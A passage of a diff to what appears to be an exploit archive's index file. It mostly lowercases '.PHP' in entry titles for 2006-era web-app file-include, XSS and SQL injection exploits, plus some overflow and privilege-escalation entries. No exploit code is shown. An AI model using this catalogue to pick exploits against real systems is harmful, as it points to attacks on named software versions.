Vulnerability",2006-10-02,meto5757,php,webapps,0 +28736,platforms/php/webapps/28736.txt,"DeluxeBB 1.09 Sig.php Remote File Include Vulnerability",2006-10-02,r0ut3r,php,webapps,0 +28737,platforms/php/webapps/28737.txt,"PHP Web Scripts Easy Banner Functions.php Remote File Include Vulnerability",2006-10-02,"abu ahmed",php,webapps,0 +28738,platforms/php/webapps/28738.txt,"Digishop 4.0 Cart.php Cross-Site Scripting Vulnerability",2006-10-02,meto5757,php,webapps,0 28739,platforms/hardware/dos/28739.pl,"Motorola SB4200 - Remote Denial of Service Vulnerability",2006-10-03,"Dave Gil",hardware,dos,0 -28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 Template.PHP Script Code Injection Vulnerability",2006-10-03,"James Bercegay",php,webapps,0 +28740,platforms/php/webapps/28740.txt,"HAMweather 3.9.8 Template.php Script Code Injection Vulnerability",2006-10-03,"James Bercegay",php,webapps,0 28741,platforms/php/webapps/28741.txt,"Yener Haber Script 1.0/2.0 - SQL Injection Vulnerability",2006-10-04,Dj_ReMix,php,webapps,0 28742,platforms/asp/webapps/28742.txt,"ASPPlayGround.NET Forum 2.4.5 Calendar.ASP Cross-Site Scripting Vulnerability",2006-10-27,MizoZ,asp,webapps,0 28743,platforms/php/webapps/28743.txt,"osCommerce 2.2 admin/banner_manager.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 @@ -25793,50 +25793,50 @@ id,file,description,date,author,platform,type,port 28758,platforms/php/webapps/28758.txt,"osCommerce 2.2 admin/tax_rates.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28759,platforms/php/webapps/28759.txt,"osCommerce 2.2 admin/zones.php page Parameter XSS",2006-10-04,Lostmon,php,webapps,0 28760,platforms/php/remote/28760.php,"PHP 3-5 ZendEngine ECalloc Integer Overflow Vulnerability",2006-10-05,anonymous,php,remote,0 -28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x Index.PHP Remote File Include Vulnerability",2006-10-05,MoHaNdKo,php,webapps,0 +28761,platforms/php/webapps/28761.txt,"WikyBlog 1.2.x Index.php Remote File Include Vulnerability",2006-10-05,MoHaNdKo,php,webapps,0 28762,platforms/asp/webapps/28762.txt,"Civica Display.ASP SQL Injection Vulnerability",2006-10-05,CodeXpLoder'tq,asp,webapps,0 28763,platforms/windows/local/28763.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation Vulnerability (1)",2006-08-26,"Ruben Santamarta ",windows,local,0 28764,platforms/windows/local/28764.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation Vulnerability (2)",2006-08-26,"Ruben Santamarta ",windows,local,0 28765,platforms/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote,0 28766,platforms/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote,0 -28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 Login.PHP Multiple SQL Injection Vulnerabilities",2006-10-06,"Francesco Laurita",php,webapps,0 +28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 Login.php Multiple SQL Injection Vulnerabilities",2006-10-06,"Francesco Laurita",php,webapps,0 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 Uyegiris.ASP SQL Injection Vulnerability",2006-10-06,"Dj ReMix",asp,webapps,0 -28769,platforms/php/webapps/28769.txt,"Interspire FastFind Index.PHP Cross-Site Scripting Vulnerability",2006-09-27,MizoZ,php,webapps,0 +28769,platforms/php/webapps/28769.txt,"Interspire FastFind Index.php Cross-Site Scripting Vulnerability",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module SQL Injection Vulnerability",2006-10-08,disfigure,php,webapps,0 -28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 Functions.inc.PHP Remote File Include Vulnerability",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 Functions.inc.php Remote File Include Vulnerability",2006-10-08,ThE-WoLf-KsA,php,webapps,0 28772,platforms/php/webapps/28772.txt,"ISearch 2.16 ISEARCH_PATH Parameter Remote File Include Vulnerability",2006-10-09,MoHaNdKo,php,webapps,0 -28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 Index.PHP Remote File Include Vulnerability",2006-10-09,Crackers_Child,php,webapps,0 +28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 Index.php Remote File Include Vulnerability",2006-10-09,Crackers_Child,php,webapps,0 28774,platforms/php/webapps/28774.txt,"PHPWebSite 0.10.2 PHPWS_SOURCE_DIR Parameter Multiple Remote File Include Vulnerabilities",2006-10-09,Crackers_Child,php,webapps,0 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x IMAP SMTP Command Injection Vulnerability",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 28778,platforms/php/webapps/28778.txt,"ironwebmail <= 6.1.1 - Directory Traversal information disclosure Vulnerability",2006-10-16,"Derek Callaway",php,webapps,0 -28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 Getimg.PHP Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 -28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 Grid3.lib.PHP Remote File Include Vulnerabilities",2006-10-10,k1tk4t,php,webapps,0 -28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 GoogleSearch.PHP Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 -28782,platforms/php/webapps/28782.txt,"Tagit2b DelTagUser.PHP Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 -28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 SQL.PHP Cross-Site Scripting Vulnerability",2006-10-10,Crackers_Child,php,webapps,0 -28784,platforms/php/webapps/28784.txt,"Gcards 1.13 Addnews.PHP Remote File Include Vulnerability",2006-10-11,"DeatH VirUs",php,webapps,0 +28779,platforms/php/webapps/28779.txt,"Album Photo Sans Nom 1.6 Getimg.php Remote File Include Vulnerability",2006-10-10,DarkFig,php,webapps,0 +28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 Grid3.lib.php Remote File Include Vulnerabilities",2006-10-10,k1tk4t,php,webapps,0 +28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 GoogleSearch.php Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 +28782,platforms/php/webapps/28782.txt,"Tagit2b DelTagUser.php Remote File Include Vulnerability",2006-10-10,k1tk4t,php,webapps,0 +28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 SQL.php Cross-Site Scripting Vulnerability",2006-10-10,Crackers_Child,php,webapps,0 +28784,platforms/php/webapps/28784.txt,"Gcards 1.13 Addnews.php Remote File Include Vulnerability",2006-10-11,"DeatH VirUs",php,webapps,0 28785,platforms/windows/dos/28785.c,"Google Earth 4.0.2091 (beta) - KML/KMZ Files Buffer Overflow Vulnerability",2006-09-14,JAAScois,windows,dos,0 -28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 Bug.PHP Remote File Include Vulnerability",2006-10-11,"Nima Salehi",php,webapps,0 +28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 Bug.php Remote File Include Vulnerability",2006-10-11,"Nima Salehi",php,webapps,0 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Includes Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 28788,platforms/solaris/local/28788.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability (1)",2006-10-13,"Marco Ivaldi",solaris,local,0 28789,platforms/solaris/local/28789.sh,"Sun Solaris Netscape Portable Runtime API 4.6.1 - Local Privilege Escalation Vulnerability (2)",2006-10-24,"Marco Ivaldi",solaris,local,0 28790,platforms/php/webapps/28790.txt,"PHPList 2.x Public Pages MultipleCross-Site Scripting Vulnerabilities",2006-10-12,"Michiel Dethmers",php,webapps,0 -28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b Config.PHP Remote File Include Vulnerability",2006-10-12,"Le CoPrA",php,webapps,0 +28791,platforms/php/webapps/28791.txt,"PHP TopSites FREE 1.022b Config.php Remote File Include Vulnerability",2006-10-12,"Le CoPrA",php,webapps,0 28792,platforms/php/webapps/28792.txt,"MamboLaiThai ExtCalThai 0.9.1 - admin_events.php CONFIG_EXT[LANGUAGES_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 28793,platforms/php/webapps/28793.txt,"MamboLaiThai ExtCalThai 0.9.1 - mail.inc.php CONFIG_EXT[LIB_DIR] Parameter Remote File Inclusion",2006-10-12,k1tk4t,php,webapps,0 -28794,platforms/php/webapps/28794.txt,"4Images 1.7 Details.PHP Cross-Site Scripting Vulnerability",2006-10-12,"Christian Marthen",php,webapps,0 -28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 Upload.PHP Remote Command Execution Vulnerability",2006-10-12,"HACKERS PAL",php,webapps,0 -28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full Archive_Topic.PHP Remote File Include Vulnerability",2006-09-29,"Nima Salehi",php,webapps,0 +28794,platforms/php/webapps/28794.txt,"4Images 1.7 - Details.php Cross-Site Scripting Vulnerability",2006-10-12,"Christian Marthen",php,webapps,0 +28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 Upload.php Remote Command Execution Vulnerability",2006-10-12,"HACKERS PAL",php,webapps,0 +28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full Archive_Topic.php Remote File Include Vulnerability",2006-09-29,"Nima Salehi",php,webapps,0 28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - index.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28800,platforms/php/webapps/28800.txt,"Bloq 0.5.4 - rss2.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 -28803,platforms/php/webapps/28803.txt,"Xoops <= 2.2.3 - Search.PHP Cross-Site Scripting Vulnerability",2006-10-13,b0rizQ,php,webapps,0 -28804,platforms/php/webapps/28804.pl,"PHPBB Add Name Module Not_Mem.PHP Remote File Include Vulnerability",2006-10-13,"Nima Salehi",php,webapps,0 +28803,platforms/php/webapps/28803.txt,"Xoops <= 2.2.3 - Search.php Cross-Site Scripting Vulnerability",2006-10-13,b0rizQ,php,webapps,0 +28804,platforms/php/webapps/28804.pl,"PHPBB Add Name Module Not_Mem.php Remote File Include Vulnerability",2006-10-13,"Nima Salehi",php,webapps,0 30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - (.ico) Buffer Overflow Vulnerability",2013-12-11,"Core Security",windows,dos,0 29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Local Privilege Escalation Exploit",2013-10-08,"Lorenzo Cantoni",linux,local,0 @@ -25847,39 +25847,39 @@ id,file,description,date,author,platform,type,port 28811,platforms/osx/dos/28811.txt,"Apple Motion 5.0.7 Integer Overflow Vulnerability",2013-10-08,"Jean Pascal Pereira",osx,dos,0 28812,platforms/freebsd/dos/28812.c,"FreeBSD 5.5/6.x Scheduler Policy Local Denial of Service Vulnerability",2006-10-13,"Diane Bruce",freebsd,dos,0 28813,platforms/freebsd/dos/28813.c,"FreeBSD 6.0/6.1 Ftrucante Local Denial of Service Vulnerability",2006-10-13,"Kirk Russell",freebsd,dos,0 -28814,platforms/php/webapps/28814.txt,"RamaCMS ADODB.Inc.PHP Remote File Include Vulnerability",2006-10-13,"Le CoPrA",php,webapps,0 -28815,platforms/php/webapps/28815.txt,"H-Sphere 2.x WebShell Login.PHP Cross-Site Scripting Vulnerability",2006-10-14,b0rizQ,php,webapps,0 +28814,platforms/php/webapps/28814.txt,"RamaCMS ADODB.Inc.php Remote File Include Vulnerability",2006-10-13,"Le CoPrA",php,webapps,0 +28815,platforms/php/webapps/28815.txt,"H-Sphere 2.x WebShell Login.php Cross-Site Scripting Vulnerability",2006-10-14,b0rizQ,php,webapps,0 28816,platforms/linux/dos/28816.txt,"KMail 1.x HTML Element Handling Denial of Service Vulnerability",2006-10-16,nnp,linux,dos,0 28817,platforms/multiple/local/28817.txt,"Internet Security Systems 3.6 = ZWDeleteFile Function Arbitrary File Deletion Vulnerability",2006-10-16,"Matousec Transparent security",multiple,local,0 -28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 HTMLTemplate.PHP Remote File Include Vulnerability",2006-10-16,The_BeKiR,php,webapps,0 -28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.PHP Remote File Include Vulnerability",2006-10-17,The_BeKiR,php,webapps,0 -28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 Index.PHP Cross-Site Scripting Vulnerability",2006-10-17,Lostmon,php,webapps,0 -28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 Example6.PHP Remote File Include Vulnerability",2006-10-16,ERNE,php,webapps,0 +28818,platforms/php/webapps/28818.txt,"Mambo MostlyCE 4.5.4 HTMLTemplate.php Remote File Include Vulnerability",2006-10-16,The_BeKiR,php,webapps,0 +28819,platforms/php/webapps/28819.txt,"Lodel CMS 0.7.3 Calcul-Page.php Remote File Include Vulnerability",2006-10-17,The_BeKiR,php,webapps,0 +28820,platforms/php/webapps/28820.txt,"Webgenius Goop Gallery 2.0 Index.php Cross-Site Scripting Vulnerability",2006-10-17,Lostmon,php,webapps,0 +28821,platforms/php/webapps/28821.txt,"Maintain 3.0.0-RC2 Example6.php Remote File Include Vulnerability",2006-10-16,ERNE,php,webapps,0 28822,platforms/windows/dos/28822.txt,"Microsoft Class Package Export Tool 5.0.2752 - Clspack.exe Local Buffer Overflow Vulnerability",2006-10-16,mmd_000,windows,dos,0 28823,platforms/php/webapps/28823.pl,"PowerMovieList 0.13/0.14 Edit User HTML Injection Vulnerability",2006-10-16,MP,php,webapps,0 -28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 Index.PHP Cross-Site Scripting Vulnerability",2006-10-17,b0rizQ,php,webapps,0 -28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 Index.PHP Cross-Site Scripting Vulnerability",2006-10-17,CorryL,php,webapps,0 -28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 Rpc.PHP Unauthorized Access Vulnerability",2006-10-18,jonepet,php,webapps,0 +28824,platforms/php/webapps/28824.txt,"PHPList 2.10.2 Index.php Cross-Site Scripting Vulnerability",2006-10-17,b0rizQ,php,webapps,0 +28825,platforms/php/webapps/28825.txt,"Dev Web Manager System 1.5 Index.php Cross-Site Scripting Vulnerability",2006-10-17,CorryL,php,webapps,0 +28826,platforms/php/webapps/28826.txt,"Cerberus Helpdesk 3.2.1 Rpc.php Unauthorized Access Vulnerability",2006-10-18,jonepet,php,webapps,0 28827,platforms/php/webapps/28827.txt,"PHP Live Helper 1.17 - Multiple Remote File Include Vulnerabilities",2006-10-18,Matdhule,php,webapps,0 -28828,platforms/php/webapps/28828.txt,"Zorum 3.5 DBProperty.PHP Remote File Include Vulnerability",2006-10-19,MoHaNdKo,php,webapps,0 +28828,platforms/php/webapps/28828.txt,"Zorum 3.5 DBProperty.php Remote File Include Vulnerability",2006-10-19,MoHaNdKo,php,webapps,0 28829,platforms/asp/webapps/28829.txt,"Kinesis Interactive Cinema System Index.ASP SQL Injection Vulnerability",2006-10-18,fireboy,asp,webapps,0 -28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 Index.PHP Remote File Include Vulnerability",2006-10-19,"Alireza Ahari",php,webapps,0 -28831,platforms/php/webapps/28831.txt,"Simple Machines Forum 1.0/1.1 Index.PHP Cross-Site Scripting Vulnerability",2006-10-19,b0rizQ,php,webapps,0 +28830,platforms/php/webapps/28830.pl,"Free FAQ 1.0 Index.php Remote File Include Vulnerability",2006-10-19,"Alireza Ahari",php,webapps,0 +28831,platforms/php/webapps/28831.txt,"Simple Machines Forum 1.0/1.1 Index.php Cross-Site Scripting Vulnerability",2006-10-19,b0rizQ,php,webapps,0 28832,platforms/php/webapps/28832.txt,"ATutor 1.5.3 - Multiple Remote File Include Vulnerabilities",2006-10-19,SuBzErO,php,webapps,0 -28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 Config.PHP SQL Injection Vulnerability",2006-10-20,G1UK,php,webapps,0 +28833,platforms/php/webapps/28833.pl,"Casinosoft Casino Script 3.2 Config.php SQL Injection Vulnerability",2006-10-20,G1UK,php,webapps,0 28834,platforms/windows/dos/28834.txt,"Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability",2006-10-20,"Alberto Cortes",windows,dos,0 28835,platforms/novell/remote/28835.pl,"Novell eDirectory 8.x iMonitor HTTPSTK Buffer Overflow Vulnerability (1)",2006-10-21,"Manuel Santamarina Suarez",novell,remote,0 28836,platforms/novell/remote/28836.c,"Novell eDirectory 8.x iMonitor HTTPSTK Buffer Overflow Vulnerability (2)",2006-10-30,Expanders,novell,remote,0 28837,platforms/novell/remote/28837.rb,"Novell eDirectory 8.x iMonitor HTTPSTK Buffer Overflow Vulnerability (3)",2006-10-30,MC,novell,remote,0 -28838,platforms/php/webapps/28838.txt,"ClanLite Config-PHP.PHP Remote File Include Vulnerability",2006-10-23,x_w0x,php,webapps,0 +28838,platforms/php/webapps/28838.txt,"ClanLite Config-PHP.php Remote File Include Vulnerability",2006-10-23,x_w0x,php,webapps,0 28839,platforms/php/webapps/28839.txt,"SchoolAlumni Portal 2.26 smumdadotcom_ascyb_alumni/mod.php katalog Module query Parameter XSS",2006-10-23,MP,php,webapps,0 28840,platforms/php/webapps/28840.txt,"SchoolAlumni Portal 2.26 mod.php mod Parameter Traversal Local File Inclusion",2006-10-23,MP,php,webapps,0 -28841,platforms/php/webapps/28841.txt,"RMSOFT Gallery System 2.0 Images.PHP Cross-Site Scripting Vulnerability",2006-10-23,FREAK_PR,php,webapps,0 +28841,platforms/php/webapps/28841.txt,"RMSOFT Gallery System 2.0 Images.php Cross-Site Scripting Vulnerability",2006-10-23,FREAK_PR,php,webapps,0 28842,platforms/php/webapps/28842.txt,"Zwahlen's Online Shop 5.2.2 Cat Parameter Cross-Site Scripting Vulnerability",2006-10-23,MC.Iglo,php,webapps,0 28843,platforms/php/webapps/28843.txt,"cPanel 10.9 - DoSetmytheme theme Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 28844,platforms/php/webapps/28844.txt,"cPanel 10.9 editzonetemplate template Parameter XSS",2006-10-23,Crackers_Child,php,webapps,0 28845,platforms/php/webapps/28845.txt,"Shop-Script Multiple HTTP Response Splitting Vulnerabilities",2006-10-23,"Debasis Mohanty",php,webapps,0 -28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x Waka.PHP Multiple HTML-Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 +28846,platforms/php/webapps/28846.html,"WikiNi 0.4.x Waka.php Multiple HTML-Injection Vulnerabilities",2006-10-23,"Raphael Huck",php,webapps,0 28847,platforms/hardware/remote/28847.txt,"D-Link DSL-G624T Information Disclosure Vulnerability",2006-10-23,jose.palanco,hardware,remote,0 28848,platforms/hardware/remote/28848.txt,"INCA IM-204 Information Disclosure Vulnerability",2006-10-23,Crackers_Child,hardware,remote,0 28849,platforms/windows/remote/28849.txt,"Cruiseworks 1.09 Cws.EXE Doc Directory Traversal Vulnerability",2006-10-24,"Tan Chew Keong",windows,remote,0 @@ -25894,44 +25894,44 @@ id,file,description,date,author,platform,type,port 28859,platforms/php/webapps/28859.txt,"Simpnews 2.x admin/pwlost.php Unspecified XSS",2006-10-24,security@vigilon.com,php,webapps,0 28860,platforms/windows/dos/28860.c,"FtpXQ Server 3.01 MKD Command Remote Overflow DoS",2006-10-24,"Federico Fazzi",windows,dos,0 28861,platforms/php/webapps/28861.txt,"Comment IT 0.2 PathToComment Parameter Remote File Include Vulnerability",2006-10-25,"Cold Zero",php,webapps,0 -28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 Init.PHP Remote File Include Vulnerability",2006-10-25,The-0utl4w,php,webapps,0 -28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 User.PHP Cross-Site Scripting Vulnerability",2006-10-26,R00t[ATI],php,webapps,0 +28862,platforms/php/webapps/28862.txt,"PHPMyConferences 8.0.2 Init.php Remote File Include Vulnerability",2006-10-25,The-0utl4w,php,webapps,0 +28863,platforms/php/webapps/28863.txt,"MAXdev MD-Pro 1.0.76 User.php Cross-Site Scripting Vulnerability",2006-10-26,r00t,php,webapps,0 28864,platforms/php/webapps/28864.txt,"PhpLeague 0.81 consult/miniseul.php cheminmini Parameter Remote File Inclusion",2006-10-26,ajaan,php,webapps,0 -28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 TreeViewClass.PHP Remote File Include Vulnerability",2006-10-27,"Prince Islam",php,webapps,0 -28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 Change_Pass.PHP Cross-Site Scripting Vulnerability",2006-10-30,SnipEr.X,php,webapps,0 -28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 Dir.PHP Directory Traversal Vulnerability",2006-10-27,Christopher,php,webapps,0 -28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 Bannieres.PHP Remote File Include Vulnerability",2006-10-27,Mahmood_ali,php,webapps,0 +28865,platforms/php/webapps/28865.txt,"PHPTreeView 1.0 TreeViewClass.php Remote File Include Vulnerability",2006-10-27,"Prince Islam",php,webapps,0 +28866,platforms/php/webapps/28866.txt,"IG Shop 1.4 Change_Pass.php Cross-Site Scripting Vulnerability",2006-10-30,SnipEr.X,php,webapps,0 +28867,platforms/php/webapps/28867.txt,"TorrentFlux 2.1 Dir.php Directory Traversal Vulnerability",2006-10-27,Christopher,php,webapps,0 +28868,platforms/php/webapps/28868.txt,"PLS-Bannieres 1.21 Bannieres.php Remote File Include Vulnerability",2006-10-27,Mahmood_ali,php,webapps,0 28869,platforms/asp/webapps/28869.txt,"Web Wiz Forum 6.34/7.x Search.ASP SQL Injection Vulnerability",2006-10-28,almaster,asp,webapps,0 28870,platforms/php/webapps/28870.txt,"PunBB 1.x SQL Injection",2006-10-30,nmsh_sa,php,webapps,0 28871,platforms/php/webapps/28871.txt,"Actionpoll 1.1.1 db/DataReaderWriter.php CONFIG_DB Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28872,platforms/php/webapps/28872.txt,"Actionpoll 1.1.1 db/PollDB.php CONFIG_DATAREADERWRITER Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28873,platforms/php/webapps/28873.txt,"Exhibit Engine 1.22 fetchsettings.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 28874,platforms/php/webapps/28874.txt,"Exhibit Engine 1.22 fstyles.php toroot Parameter Remote File Inclusion",2006-10-30,"Cyber Security",php,webapps,0 -28875,platforms/php/webapps/28875.txt,"Freenews 1.1 Aff_News.PHP Remote File Include Vulnerability",2006-10-30,MoHaNdKo,php,webapps,0 +28875,platforms/php/webapps/28875.txt,"Freenews 1.1 Aff_News.php Remote File Include Vulnerability",2006-10-30,MoHaNdKo,php,webapps,0 28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (1)",2006-10-30,"Michal Bucko",windows,remote,0 28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution Vulnerability (2)",2006-10-30,"Michal Bucko",windows,remote,0 28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 login.php username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 RemoveChild Denial of Service Vulnerability",2006-10-30,"Wojciech H",windows,dos,0 -28881,platforms/php/webapps/28881.txt,"Foresite CMS Index_2.PHP Cross-Site Scripting Vulnerability",2006-10-30,"David Vieira-Kurz",php,webapps,0 -28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 Htmlarea.PHP Cross-Site Scripting Vulnerability",2005-10-30,Vigilon,php,webapps,0 +28881,platforms/php/webapps/28881.txt,"Foresite CMS Index_2.php Cross-Site Scripting Vulnerability",2006-10-30,"David Vieira-Kurz",php,webapps,0 +28882,platforms/php/webapps/28882.txt,"phpFaber CMS 1.3.36 Htmlarea.php Cross-Site Scripting Vulnerability",2005-10-30,Vigilon,php,webapps,0 28883,platforms/php/webapps/28883.txt,"Easy Web Portal 2.1.2 - Multiple Remote File Include Vulnerabilities",2006-10-31,MEFISTO,php,webapps,0 28884,platforms/windows/remote/28884.html,"BlooMooWeb 1.0.9 - ActiveX Control - Multiple Vulnerabilities",2006-10-31,maxgipeh,windows,remote,0 -28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module Search.PHP SQL Injection Vulnerability",2006-10-31,Paisterist,php,webapps,0 -28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 Configfunction.PHP Remote File Include Vulnerability",2006-10-30,"Cyber Security",php,webapps,0 +28885,platforms/php/webapps/28885.php,"PHP-Nuke 7.x Journal Module Search.php SQL Injection Vulnerability",2006-10-31,Paisterist,php,webapps,0 +28886,platforms/php/webapps/28886.txt,"The Search Engine Project 0.942 Configfunction.php Remote File Include Vulnerability",2006-10-30,"Cyber Security",php,webapps,0 28887,platforms/java/remote/28887.txt,"Sun Java System 6.x Messenger Express Cross-Site Scripting Vulnerability",2006-10-31,Handrix,java,remote,0 28888,platforms/hardware/remote/28888.txt,"ECI Telecom B-Focus ADSL2+ Combo332+ Wireless Router Information Disclosure Vulnerability",2006-10-31,LegendaryZion,hardware,remote,0 -28889,platforms/php/webapps/28889.txt,"Netquery 4.0 NQUser.PHP Cross-Site Scripting Vulnerability",2006-10-31,"Tal Argoni",php,webapps,0 +28889,platforms/php/webapps/28889.txt,"Netquery 4.0 NQUser.php Cross-Site Scripting Vulnerability",2006-10-31,"Tal Argoni",php,webapps,0 28890,platforms/php/webapps/28890.txt,"iPlanet Messaging Server Messenger Express Expression() HTML Injection Vulnerability",2006-10-31,LegendaryZion,php,webapps,0 28891,platforms/php/webapps/28891.txt,"Mirapoint Web Mail Expression() HTML Injection Vulnerability",2006-10-31,LegendaryZion,php,webapps,0 28892,platforms/php/webapps/28892.txt,"RSSonate Project_Root Parameter Remote File Include Vulnerability",2006-11-01,Arab4services,php,webapps,0 -28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.PHP Remote File Include Vulnerability",2006-11-08,igi,php,webapps,0 +28893,platforms/php/webapps/28893.pl,"KnowledgeBuilder 2.2 visEdit_Control.Class.php Remote File Include Vulnerability",2006-11-08,igi,php,webapps,0 28894,platforms/windows/dos/28894.txt,"Outpost Firewall PRO 4.0 - Local Denial of Service Vulnerability",2006-11-01,"Matousec Transparent security",windows,dos,0 28895,platforms/linux/dos/28895.txt,"Linux Kernel 2.6.x - SquashFS Double Free Denial of Service Vulnerability",2006-11-02,LMH,linux,dos,0 28896,platforms/php/webapps/28896.txt,"RunCMS 1.x Avatar Arbitrary File Upload Vulnerability",2006-11-02,securfrog,php,webapps,0 28897,platforms/windows/dos/28897.txt,"Microsoft Internet Explorer 7.0 - MHTML Denial of Service Vulnerability",2006-11-02,"Positive Technologies",windows,dos,0 -28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.PHP SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0 -28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.PHP Remote File Include Vulnerability",2006-11-07,navairum,php,webapps,0 +28898,platforms/php/webapps/28898.txt,"FreeWebShop 2.2 Index.php SQL Injection Vulnerability",2006-11-02,Spiked,php,webapps,0 +28899,platforms/php/webapps/28899.txt,"NewP News Publishing System 1.0 Class.Database.php Remote File Include Vulnerability",2006-11-07,navairum,php,webapps,0 28900,platforms/php/webapps/28900.txt,"ac4p Mobile index.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28901,platforms/php/webapps/28901.txt,"ac4p Mobile MobileNews.php Multiple Parameter XSS",2006-11-03,AL-garnei,php,webapps,0 28902,platforms/php/webapps/28902.txt,"ac4p Mobile polls.php Multiple Parameter 